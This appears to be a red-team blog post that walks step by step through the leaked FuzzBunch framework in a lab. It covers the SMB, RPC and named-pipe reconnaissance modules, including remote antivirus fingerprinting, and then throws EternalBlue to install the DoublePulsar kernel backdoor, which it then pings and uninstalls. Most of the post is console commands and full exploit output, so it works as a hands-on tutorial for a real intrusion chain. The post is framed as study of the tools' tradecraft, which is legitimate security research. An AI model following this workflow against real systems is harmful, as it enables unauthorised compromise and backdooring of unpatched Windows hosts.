Match Made In The Shadows: Part [2]
Intro
At this point of the post, I assume you have set up a full environment from Part [1] post here. Today we will be covering using FuzzBunch (FB) for exploitation, and the tradecraft considerations they took in the design and what it says about the prowess of this actor. As a Red Teamer, I often find skill in the operator and their knowledge of the toolkit vs capbaility of the tool. This terminology is referred to as a Tool Champion[1] by this actor in a few cases.
In this series we are going to cover the following:
- Environment setup and configuration
- Walk through an exploit scenario and tutorial
- Cover tradecraft and the advanced nature of the DanderSpritz agent
- Additional deep dive into components
This post will only cover portion two (2) as the material and setup are dense.
FuzzBunch Touches
Before even considering exploitation I'm sure as any good operator would do they would do some level of checks, one of the exciting toolsets packaged inside FB is "Touches". Touch is a suite of tools that allow an operator to perform effective integration against targets as well as pull back data and fingerprint a host. This functionality is a typical perspective or function you may have you used inside Metasploit in the past.
SmbTouch (ST)
When dealing with SMB, all cards are on the table for exploitation, being one of the top targets in a Windows enviroment. When in environments with exclusion trusted resources within a domain, you're going to see Port 445 open. ST was built exactly for this scenario.
This tool allows an operator to check the targets OS, Pipes and if the target is vulnerable to any exploits within FB. One thing to note is if you ever had to deal with SMB packet analysis you may be familiar with Anonymous sessions. By default, ST uses this to enumerate the host, if a credential data happens to be provided, that has access to the target it will be able to authenticate to the hosts NamedPipes. This technique is valid for any host over Win7 since XP was the last version that supported anonymous access to named pipes. Bellow is example output from my lab machine:
[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Smbtouch) > execute
[!] Preparing to Execute Smbtouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Smbtouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt False
Pipe
Share
Protocol SMB
Credentials Anonymous
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started
[*] TargetIp 192.168.251.136
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 6.1 build 7601
Windows 7 Enterprise 7601 Service Pack 1
[*] Trying pipes...
[-] spoolss - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] browser - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] lsarpc - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Not Vulnerable]
ETERNALROMANCE - Named pipe required for exploit
ETERNALCHAMPION - Not a browser for unauth, pipe/share required
[Vulnerable]
ETERNALBLUE - DANE
[*] Writing output parameters
[+] Target is vulnerable to 1 exploit
[+] Touch completed successfully
[+] Smbtouch Succeeded
Rpctouch
This module is a meta-module of the Smbtouch it seems, allowing an operator to set flags to target Architecture, Langauge, and versioning. The Arch will not work unless you have access to the "Browser" pipe of course.
fb > use Rpctouch
[!] Entering Plugin Context :: Rpctouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Rpctouch) > execute
[!] Preparing to Execute Rpctouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Rpctouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
NetBIOSName *SMBSERVER
TouchLanguage False
TouchArchitecture False
Protocol SMB
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] SMB String: Windows 7 Enterprise 7601 Service Pack 1 (WIN7SP1)
[+] Rpctouch Succeeded
ArchTouch (AT)
As shown above, RT enumerates the version, one thing to note is that using this method you will not be able to enumerate the Architecture since you will not have access to the "Browser" pipe[2]. It seems that when connecting to an DCE-RPC endpoint on the port (49152), AT sends a crafted packet to BIND to the service. When this takes place, a few transactional structures are passed to optimize performance between the two endpoints such as version, and CTX items. This process prompts a response from the RPC mapper, indicating an acceptance or rejection of each CTX item. Due to nature of this tool, I was inherently curious about how it worked as I didn't know this was possible to do on a Windows 7 machine.
DCE/RPC Bind call (Req)
When AT send its first packet, it starts a TCP handshake and sends an RPC Bind request. Packaged in this request is two (2) items of interest. A 32-bit Network Data Representation (NDR) and a 64 bit NDR.
The NDR wire protocol, also referred to as transfer syntax, enables RPC calls to traverse the network. The wire protocol defines the wire representation of an RPC call, such as the order in which data members are marshaled, alignment of data on the wire, additional information included with the data, and other issues.[3]
Bellow is a HEX+ASCII dump and tree dump from Wireshark if intrested:
0000 05 00 0b 03 10 00 00 00 74 00 00 00 00 00 00 00 ........t.......
0010 d0 16 d0 16 00 00 00 00 02 00 00 00 00 00 01 00 ................
0020 80 bd a8 af 8a 7d c9 11 be f4 08 00 2b 10 29 89 .....}......+.).
0030 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 .....]..........
0040 2b 10 48 60 02 00 00 00 01 00 01 00 80 bd a8 af +.H`............
0050 8a 7d c9 11 be f4 08 00 2b 10 29 89 01 00 00 00 .}......+.).....
0060 33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36 3.qq..7I.......6
0070 01 00 00 00 ....
Distributed Computing Environment / Remote Procedure Call (DCE/RPC) Bind, Fragment: Single, FragLen: 116, Call: 0
Version: 5
Version (minor): 0
Packet type: Bind (11)
Packet Flags: 0x03
Data Representation: 10000000 (Order: Little-endian, Char: ASCII, Float: IEEE)
Frag Length: 116
Auth Length: 0
Call ID: 0
Max Xmit Frag: 5840
Max Recv Frag: 5840
Assoc Group: 0x00000000
Num Ctx Items: 2
Ctx Item[1]: Context ID:0, MGMT, 32bit NDR
Context ID: 0
Num Trans Items: 1
Abstract Syntax: MGMT V1.0
Transfer Syntax[1]: 32bit NDR V2
Transfer Syntax: 32bit NDR UUID:8a885d04-1ceb-11c9-9fe8-08002b104860
ver: 2
Ctx Item[2]: Context ID:1, MGMT, 64bit NDR
Context ID: 1
Num Trans Items: 1
Abstract Syntax: MGMT V1.0
Transfer Syntax[1]: 64bit NDR V1
Transfer Syntax: 64bit NDR UUID:71710533-beba-4937-8319-b5dbef9ccc36
ver: 1
DCE/RPC Bind call (Rep)
If the endpoint replies it sends back the proper NDR to serialize with for optimal performance (from the research I have seen). In this packet is two (2) CTX items.
First being a rejection of one platform:
0000 02 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 00 00 00 00 00 00 00 00 ........
Ctx Item[1]: Provider rejection, PNIO (Implicit Ar)
Ack result: Provider rejection (2)
Ack reason: Proposed transfer syntaxes not supported (2)
Transfer Syntax: PNIO (Implicit Ar)
Syntax ver: 0
Second being the Acceptance of supported provider, denoting the endpoint target arch. A nifty method I didn't know about, maybe I'm just behind the times haha!
0000 00 00 00 00 33 05 71 71 ba be 37 49 83 19 b5 DB ....3.qq..7I....
0010 ef 9c cc 36 01 00 00 00 ...6....
Ctx Item[2]: Acceptance, 64bit NDR
Ack result: Acceptance (0)
Transfer Syntax: 64bit NDR
Syntax ver: 1
NOTE: NMAP does not have a check for this after some research it seems... hmm
Finally using this module proves simple:
fb > use Architouch
[!] Entering Plugin Context :: Architouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Architouch) > execute
[!] Preparing to Execute Architouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [49152] :
[+] (TCP) Local 192.168.251.136:49152
[+] Configure Plugin Remote Tunnels
Module: Architouch
==================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 49152
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting...success
[*] Binding to RPC...success
[+] Target is x64
[+] Touch completed successfully
[+] Architouch Succeeded
Namedpipetouch
One of the major reasons I took the time to do this blog was not to recap on the leak of these tools, but to de dive on the thought process behind the tool usage. We can always learn from others, and NPT is a great example of this. At first glance this module does not provide much insight into the use case for such a tool:
fb > use Namedpipetouch
[!] Entering Plugin Context :: Namedpipetouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
fb Touch (Namedpipetouch) > execute
[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Namedpipetouch
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
UsingNbt False
PipeList ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',
'\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '
\PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\
afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus
er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9
eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8
... (plus 47 more lines)
DescList ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'
, 'OS Pipe: print spooler', '360 Safe', '360 Safe'
, 'alwil Avast professional 4.8 Avast Internet Sec
urity v5.0', 'Avast Internet Security 5.0', 'Avast
Internet Security 5.0', 'Avast pro 4.8 or Avast I
S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',
... (plus 35 more lines)
Protocol SMB
PipeList - A hidden gem
Something fascinating I have not thought about (Granted I don't have Eternal* exploits lying around) is the way exploits are most likely deployed. Any exploit developer worth his salt performs some Continous Integration (CI) and that most likely includes the testing of AV. After using this tool in the lab; I hypothesized an exploit of this stature most likely came with rules or other checks that must be done to ensure they aren't putting it at risk. The dollar value of such a tool has to be extremely high I would imagine.
Must of the checks turn out to be for AV? That seems to line up with a workflow that would make sense to deploy EternalBlue:
FB -> Smbtouch -> Rpctouch? -> Namedpipelist checks -> EternalBlue
This type of check for a Red Team is invaluable for enumerating AV software remotely, in many cases this is just speculation of an Unkown and a risk of operating.
Red Team: Are you checking for this? as this is an amazing check to add to the toolkit!
Bellow is the final output denoting specific pipes found (Take note of 2010, an observation on the last update to pipe list they are checking for?):
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes
[+] Testing for OS Pipe: computer browser.
[+] Testing for OS Pipe: lsass rpc
[+] Pipe Found: \PIPE\lsarpc
[+] Testing for OS Pipe: print spooler.
[+] Testing for 360 Safe..
[+] Testing for all Avast professional 4.8 Avast Internet Security v5.0.
[+] Testing for Avast Internet Security 5.0.
[+] Testing for Avast pro 4.8 or Avast IS v5.0.
[+] Testing for AVG IS 8.5.......
[+] Testing for AVG IS 8.5-9.0.
[+] Testing for AVG IS 9.0.646............
[+] Testing for avira antivirus personal edition premium v7.06, avira premium security suite v7.
[+] Testing for avira premium sec suite v8.......
[+] Testing for Avira premium security suite v8.
[+] Testing for BitDefender 2010 v13.
[+] Testing for BitDefender TotalSec 2010 v13.0.11...
[+] Testing for BitDefender TotalSec 2010 v13.0.11 Bit Defender Total Security 2009...
[+] Testing for FSecure 2010...........................
[+] Testing for McAfee 8.7i..
[+] Testing for Norton Internet Security 2010.
[+] Testing for Norton IS 2008.
[+] Testing for Norton360 v4; Norton IS 2009; Norton IS 2010; Norton 360 v4.
[+] Testing for Norton360 v4.
[+] Testing for Outpost Security Suite Pro 2009 v6.5.
[+] Testing for Panda IS 2010 v15....
[+] Testing for Sophos 9.0.
[+] Testing for TrendMicro IS 2010 v17.50.
[+] Testing for VMWare Host.
[*] Summary: 1 pipes found
OS Pipe: lsass rpc - \PIPE\lsarpc
[+] Namedpipetouch Succeeded
FuzzBunch Specials
One of the more popular portions of the dump was the mass amount of exploits, which many of the exploits are still unpatched on older systems such as XP/2003. Which while everyone took the time patch for EB, ESTEEMAUDIT and others are just as viable options on older systems once internal to a network.
To keep this blog focused and on the topic, we will only be using EternalBlue and analyzing the setup, prep, execution of EB.
FuzzBunch Internals
We talked a bit earlier that FB is an exploitation framework, one that resembles a Metasploit. Being modular requires the ability to adopt new exploits, code, etc. An XML file also accompanies each exploit and module with the required/optional fields.
Analyzing EternalBlue's fields (XML)
A few things to note is the ability to launch via a "DaveProxyPort" at this point I'm speculating this is some redirector as I have not gotten time to look deep into this. Standard options exist:
- Target IP
- Target Port
- Validate Implant
- Validate Target
- <inputparameters>
- <parameter hidden="true" type="TcpPort" name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port">
<default>0</default>
</parameter>
<-----------SNIP---------->
<parameter xdevmap="ETERNALBLUE_DOUBLEPULSAR_PRESENT" type="Boolean" name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" />
</outputparameters>
- <redirection>
<local protocol="TCP" listenaddr="TargetIp" listenport="TargetPort" closeoncompletion="true" destaddr="//identifier" destport="//service[name='SMB']/port" />
Analyzing EternalBlue's Targets (XML)
The first thing of interest is dating the toolset to the best of my ability. It has already been known that this exploit affects nearly all platforms of Windows. But what is interesting is this exploit manifest only shows support up to Windows 7 and 2008R2 Server! We can gain some insight in that knowing the authors would have of course added support to this tool when the operating systems where released. Dating this tool back or before Windows 2012, an interesting piece of the puzzle.
<os name="Windows XP" family="windows" architecture="x86 32-bit">
<bindtovalue name="Target" value="XP" />
</os>
<---------------SNIP-------------->
- <os servicepack="1" name="Windows 7" family="windows" architecture="x64 64-bit">
<bindtovalue name="Target" value="WIN72K8R2" />
</os>
FuzzBunch Explosion Tutorial
One of the exciting aspects of FB is its clear and concise protection of operator mistake. Its simple yet powerful in the way it always checks with its user before moving forward, and in some cases multiple times. An example of the prowess of the operators and tools being deployed, it has to be one of the most professional platforms I have ever seen in using exploits and mistake prevention.
EternalBlue Setup
Its quite easy, all you have to is use the use
command to drop into a module. Then if you type execute
it will walk you through all of the proper settings.
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode:: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] : no
[!] Skipping Prompt
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
Eternalblue Throw
Once all settings pass the checks, and you work your way through the above, you will be able to send the exploit. The exploit at a high level does the following:
- Creates an Anonymous SMB session
- Runs correlated "Touch" plugin
- Validates your exploit settings match returned target
- Send initial Exploit buffer
- Creates another Anon SMB session
- Send the last fragment to exploit
- Sends egg / Disconnect
- Checks install of Kernel level backdoor
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
0x00000020 65 20 50 61 63 6b 20 31 00 e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.........DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
Eternalblue Exploit Methodology
One of the interesting aspects of this exploit is picking the type of loader they decided to deploy. Which in many cases makes total sense, allowing operators to be fluid and have options in different environmental constraints. A great example as we introduce DoublePulsar next is the ability to use this backdoor to execute user-mode code of choice. An obvious benefit to a layered option reducing the overall implants at risk at any given time in a failed exploit scenario.
DoublePulsar
Man one of my favorites in this toolkit is the expandability of nearly all toolsets as we mentioned earlier. DoublePulsar (DP) does some interesting magic that can be covered in way more detail here.
DoublePulsar Features
To interact with our freshly created Back Door, we can use DP to send different commands and install our next stage of the implant.
DoublePulsar Arch
First select the proper Architecture that we obtained from our EB output [+] Ping returned Target architecture: x64 (64-bit)
in the prior exploit.
fb > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.251.136] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
DoublePulsar Operation
In some cases, it would make sense that you would want to reverify the architecture and the operation of the Implant if you are doing maintenance or just coming back on to an Operation that may have been down for a large portion of time. So let's start with a Ping:
[?] Function [0] : 1
[+] Set Function => Ping
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
Protocol SMB
Architecture x64
Function Ping
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] Command completed successfully
[+] Doublepulsar Succeeded
Next in the case of pulling out of enviroment it even supplies a "Uninstall" function:
fb Payload (Doublepulsar) > set Function Uninstall
[+] Set Function => Uninstall
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.251.136
TargetPort 445
Protocol SMB
Architecture x64
Function Uninstall
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[.] Sending burn implant message
[+] Backdoor returned code: 10 - Success!
[+] Backdoor killed
[+] Command completed successfully
[+] Doublepulsar Succeeded
Final Thoughts
We just really brushed the surface of the entire series today, next post will be focusing on the usage and deployment of code via DP. Cheers NOTE: Not A IPA
Subscribe to Obscurity Labs
Get the latest posts delivered right to your inbox